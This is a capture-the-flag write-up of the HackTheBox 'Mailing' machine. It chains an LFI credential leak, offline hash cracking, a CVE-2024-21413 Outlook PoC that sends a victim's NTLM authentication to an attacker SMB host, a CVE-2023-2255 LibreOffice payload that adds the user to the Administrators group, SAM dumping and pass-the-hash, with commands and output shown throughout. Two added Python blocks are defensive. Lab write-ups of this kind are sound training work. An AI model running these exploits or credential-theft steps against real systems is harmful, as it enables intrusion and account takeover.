Hackthebox: Mailing

Foued SAIDI

Overview

Mailing is an easy-difficulty Windows machine from HackTheBox. An arbitrary file read in the web application discloses the hMailServer administrator credentials. Those are then used to carry out a CVE-2024-21413 phishing attack that yields another user's credentials, and finally LibreOffice's CVE-2023-2255 is exploited to gain Administrator access. It was a fun box to tackle :D

[Image: Mailing-info-card]

Reconnaissance

┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn 10.129.134.70
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2024-09-06 11:09 EDT
Nmap scan report for 10.129.134.70
Host is up (0.39s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: OK IMAP4 IDLE CAPABILITY RIGHTS=texkA0001 NAMESPACE ACL IMAP4rev1 QUOTA SORT completed CHILDREN
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: OK IMAP4 IDLE CAPABILITY RIGHTS=texkA0001 NAMESPACE ACL IMAP4rev1 QUOTA SORT completed CHILDREN
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-06T15:13:23
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.63 seconds

We can see plenty of open ports (expected, since this is a Windows box); the interesting one is 25 (SMTP), which I'll come back to later.
Port 80 redirects to mailing.htb, so we go ahead and add that entry to our /etc/hosts.

Web Application - http://mailing.htb

[Image: Mailing-info-card]

We can see a simple web application that tells us it is using hMailServer (we already know this from our nmap scan) and offers some instructions for download.

Local File Inclusion - http://mailing.htb

One interesting thing was the path behind the Download Instructions button: http://mailing.htb/download.php?file=instructions.pdf. Maybe we can leverage it to read other files on the system, abusing it as a Local File Inclusion.

Unlike Linux systems, the hosts file on Windows is located at c:/windows/system32/drivers/etc/hosts; let's try to fetch it:

[Image: Local File Inclusion]

We can see that we can successfully download the hosts file.
But is there something more critical we can download? I checked the hMailServer docs to locate its configuration file, which turns out to be c:\Program Files (x86)\hMailServer\Bin\hMailServer.ini.
And we can successfully download it:

[Image: Local File Inclusion]

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
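Both reads succeed because download.php hands the file parameter straight to the filesystem. For the defender's side, here is what such a handler needs to do instead, written in Python as an added example (not the box's PHP and not part of the original post); the download root and the allowed extensions are assumptions. PureWindowsPath is used so that Windows path semantics (drive letters, UNC prefixes, both separators) apply wherever the check runs.

```python
from pathlib import PureWindowsPath

# Hypothetical document root for the download handler (the real IIS path is not on the page).
DOWNLOAD_ROOT = PureWindowsPath(r"C:\inetpub\wwwroot\downloads")
ALLOWED_SUFFIXES = {".pdf", ".txt"}


def resolve_download(file_param: str, root: PureWindowsPath = DOWNLOAD_ROOT):
    """Map the user-supplied ?file= value to a path under root, or return None.

    Every rejection is explicit: the handler never normalises a bad path into a
    good one, it simply refuses to serve it.
    """
    if not file_param or "\x00" in file_param:
        return None
    requested = PureWindowsPath(file_param)
    # A drive ("c:"), a root ("\") or a UNC share ("\\host\share") means the caller
    # is naming an absolute location instead of a file in the download directory.
    if requested.drive or requested.root:
        return None
    # Any "." or ".." component is a traversal attempt; reject rather than collapse it.
    if any(part in (".", "..") for part in requested.parts):
        return None
    # Only document types this endpoint is meant to serve.
    if requested.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    resolved = root / requested
    # Defence in depth: the final path must still sit below the download root.
    if root not in resolved.parents:
        return None
    return resolved
```

The two files read above (the hosts file via traversal and hMailServer.ini via an absolute path) are both refused, while instructions.pdf and files in subfolders of the download root still resolve.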

We can see the AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 entry.
Let's go ahead and try to identify and crack it:

┌──(kali㉿kali)-[~]
└─$ hashid -m '841bb5acfa6779ae432fd7a4e6600ba7'
Analyzing '841bb5acfa6779ae432fd7a4e6600ba7'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]

┌──(kali㉿kali)-[~]
└─$ hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 1417/1481 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 841bb5acfa6779ae432fd7a4e6600ba7
Time.Started.....: Fri Sep 6 12:49:48 2024 (5 secs)
Time.Estimated...: Fri Sep 6 12:49:53 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1601.0 kH/s (0.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7565312/14344385 (52.74%)
Rejected.........: 0/7565312 (0.00%)
Restore.Point....: 7561216/14344385 (52.71%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: homie g 1 -> holmzy

Started: Fri Sep 6 12:49:22 2024
Stopped: Fri Sep 6 12:49:55 2024

And our password is: homenetworkingadministrator

CVE-2024-21413

Let's try to connect to the hMailServer instance. Our nmap scan also showed POP3 exposed,
and the docs say we can connect with telnet mailing.htb 110 (110 being the POP3 port):

┌──(kali㉿kali)-[~]
└─$ telnet 10.129.134.70 110
Trying 10.129.134.70...
Connected to 10.129.134.70.
Escape character is '^]'.
+OK POP3
USER [email protected]
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
stat
+OK 0 0
list
+OK 0 messages (0 octets)

We can see that there are no messages.
Since hMailServer is an e-mail server for Microsoft Windows, I looked for Microsoft Outlook CVEs, stumbled upon CVE-2024-21413 and found this PoC online (maya's e-mail address can be found in the instructions PDF):

┌──(kali㉿kali)-[~]
└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.x.x" --subject 0xkujen
┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.x.x]
Responder IPv6 [dead:beef:4::1021]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-TQ56G1P1WI8]
Responder Domain Name [FNWB.LOCAL]
Responder DCE-RPC Port [46022]

[+] Listening for events...

[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.169.187
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:66b91e7843389fd…

We can now try to crack the hash:

┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 4800H with Radeon Graphics, 1417/1481 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MAYA::MAILING:66b91e7843389fd5:162a1e0f0240e39e7229099efc356a8d:0101000000000000007267a07100db0150db3fced62a46f1000000000200080046004e005700420001001e00570049004e002d005400510035003600470031005000310057004900380004003400570049004e002d00540051003500360047003100500031005700490038002e0046004e00570042002e004c004f00430041004c000300140046004e00570042002e004c004f00430041004c000500140046004e00570042002e004c004f00430041004c0007000800007267a07100db0106000400020000000800300030000000000000000000000000200000ff3b5ab2762c9414cc314d780dd2a102c128ef1942103204e01b99a7c712d3510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00330035000000000000000000:m4y4ngs4ri

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: MAYA::MAILING:66b91e7843389fd5:162a1e0f0240e39e7229...000000
Time.Started.....: Fri Sep 6 15:33:50 2024 (6 secs)
Time.Estimated...: Fri Sep 6 15:33:56 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1151.4 kH/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m6161 -> m3808w

Started: Fri Sep 6 15:33:46 2024
Stopped: Fri Sep 6 15:33:57 2024
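Before moving on, a defender's look at what Responder actually captured. This added example (not code from the post or from the PoC) parses the hashcat line above and decodes the AV_PAIR list inside the NTLMv2 response blob, laid out as in MS-NLMP; the hash line is copied from the page and only the standard library is used. An incident responder gets from it the server name the victim's client believed it was talking to, the SPN it targeted and the authentication time.

```python
import struct
from datetime import datetime, timedelta, timezone

# NetNTLMv2 line (hashcat -m 5600 format) copied from the output above; the blob is
# split at its structural boundaries so each AV_PAIR is visible.
CAPTURED = (
    "MAYA::MAILING:66b91e7843389fd5:162a1e0f0240e39e7229099efc356a8d:"
    "0101000000000000007267a07100db0150db3fced62a46f100000000"  # fixed header
    "0200080046004e0057004200"                                  # NbDomainName
    "01001e00570049004e002d0054005100350036004700310050003100570049003800"
    "04003400570049004e002d0054005100350036004700310050003100570049003800"
    "2e0046004e00570042002e004c004f00430041004c00"
    "0300140046004e00570042002e004c004f00430041004c00"
    "0500140046004e00570042002e004c004f00430041004c00"
    "07000800007267a07100db010600040002000000"                  # Timestamp, Flags
    "0800300030000000000000000000000000200000"                  # SingleHost
    "ff3b5ab2762c9414cc314d780dd2a102c128ef1942103204e01b99a7c712d351"
    "0a00100000000000000000000000000000000000"                  # ChannelBindings
    "0900200063006900660073002f00310030002e00310030002e00310036002e0033003500"
    "0000000000000000"                                          # EOL + padding
)

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat -m 5600 line and decode the AV_PAIR list in its NTLMv2 blob."""
    user, _, domain, server_chal, nt_proof, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # Fixed part: RespType(1) HiRespType(1) Reserved(2) Reserved(4) Timestamp(8)
    # ClientChallenge(8) Reserved(4); the AV_PAIR list starts at offset 28.
    timestamp, client_chal = struct.unpack_from("<Q8s", blob, 8)
    info = {"user": user, "domain": domain, "server_challenge": server_chal,
            "nt_proof": nt_proof, "client_challenge": client_chal.hex(),
            "timestamp": filetime_to_datetime(timestamp), "av_pairs": {}}
    pos = 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                       # MsvAvEOL ends the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id in (1, 2, 3, 4, 5, 9):      # UTF-16LE strings
            info["av_pairs"][name] = value.decode("utf-16-le")
        elif av_id == 7:                     # MsvAvTimestamp is a FILETIME
            info["av_pairs"][name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:                                # Flags, SingleHost, ChannelBindings: keep hex
            info["av_pairs"][name] = value.hex()
    return info


if __name__ == "__main__":
    for name, value in parse_netntlmv2(CAPTURED)["av_pairs"].items():
        print(f"{name:16} {value}")
```

The decoded computer and domain names are the randomised ones Responder printed in its banner above, and TargetName holds the SPN of the SMB listener the client reached, which is the artifact to look for in NTLM audit and outbound-SMB logs.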

The password is maya:m4y4ngs4ri. Let’s try to evil-winrm into the machine and get our user flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri


Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type ../desktop/user.txt
4c87690f004975******************
*Evil-WinRM* PS C:\Users\maya\Documents>

Privilege Escalation - CVE-2023-2255

Doing some research on the machine, I identified that LibreOffice is installed. Checking its version, we find it vulnerable to CVE-2023-2255, and I used this public PoC for it. I will abuse the PoC to add maya to the local Administrators group:

┌──(kali㉿kali)-[~/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add'
File output.odt has been created !

We go ahead and create our output.odt file (it's Administradores instead of Administrators because the machine's locale is not English, haha).


(not sure why the execution didn’t work on other folders)

*Evil-WinRM* PS C:\important documents> curl -o output.odt 10.10.x.x:8080/output.odt
*Evil-WinRM* PS C:\important documents> ls


Directory: C:\important documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2024 9:53 PM 30526 output.odt


*Evil-WinRM* PS C:\important documents> ./output.odt
*Evil-WinRM* PS C:\important documents> net users maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2024-04-12 4:16:20 AM
Password expires Never
Password changeable 2024-04-12 4:16:20 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2024-09-06 9:53:32 PM

Logon hours allowed All

Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.

*Evil-WinRM* PS C:\important documents>

We can now use crackmapexec to dump the SAM database:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.129.169.187 -u maya -p "m4y4ngs4ri" --sam
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated and will be removed in a future release
"class": algorithms.Blowfish,
SMB 10.129.169.187 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.169.187 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.169.187 445 MAILING [+] Dumping SAM hashes
SMB 10.129.169.187 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.169.187 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.169.187 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.169.187 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.169.187 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.169.187 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.169.187 445 MAILING [+] Added 6 SAM hashes to the database

And finally we connect with the localadmin hash to get an administrative shell and retrieve our root flag:

┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec [email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users
C:\Users>cd localadmin
C:\Users\localadmin>cd Desktop
C:\Users\localadmin\Desktop>type root.txt
be8a15d7157fd9******************

C:\Users\localadmin\Desktop>

Hope you liked it!
-0xkujen

  • Title: Hackthebox: Mailing
  • Author: Foued SAIDI
  • Created at : 2024-09-06 16:06:46
  • Updated at : 2024-09-13 17:28:00
  • Link: https://kujen5.github.io/2024/09/06/Hackthebox-Mailing/
  • License: This work is licensed under CC BY-NC-SA 4.0.